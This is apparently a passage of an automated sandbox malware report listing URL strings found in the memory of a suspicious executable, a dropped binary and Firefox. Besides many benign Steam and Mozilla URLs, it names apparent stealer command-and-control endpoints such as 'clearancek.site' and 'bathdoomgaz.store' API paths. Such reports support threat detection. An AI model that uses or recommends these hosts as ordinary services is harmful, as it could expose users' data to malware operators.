Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.slt
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8d
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dY
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8du
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bathdoomgaz.store:443/api
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdy
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apiVi
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.c0
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/c
Source: 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/
Source: file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.0000000001136000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=e
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 26e226f915.exe, 0000000B.00000002.2904278824.0000000001136000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/commun
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 